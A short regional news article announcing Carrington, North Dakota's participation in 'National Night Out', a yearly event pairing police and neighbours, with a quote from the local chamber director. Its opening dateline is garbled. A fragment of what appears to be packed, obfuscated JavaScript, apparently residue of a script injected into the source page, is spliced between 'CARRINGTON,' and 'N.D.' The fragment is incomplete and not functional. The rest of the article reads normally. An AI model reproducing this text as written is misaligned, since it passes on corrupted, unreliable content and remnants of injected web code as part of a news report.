CARRINGTON, arhff|var|u0026u|referrer|shebz||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – Millions across the nation celebration “National Night Out” on the first Tuesday in August.

Carrington will be one of those communities.

“National Night Out” is an annual community-building campaign that promotes police-community partnerships and neighborhood camaraderie to make neighborhoods safer, more caring places to live. Carrington Chamber Executive Director Laurie Dietz says Carrington has participated for a number of years.

The night will bring an opportunity for police and neighbors to come together under positive circumstances.

“Millions of neighbors take part in National Night Out across thousands of communities from all fifty states, U.S. territories, Canadian cities, and military bases worldwide on the first Tuesday in August (Texas celebrates on the first Tuesday in October). Neighborhoods host block parties, festivals, parades, cookouts and various other community events with safety demonstrations, seminars, youth events, visits from emergency personnel, exhibits and much, much more,” their website states.
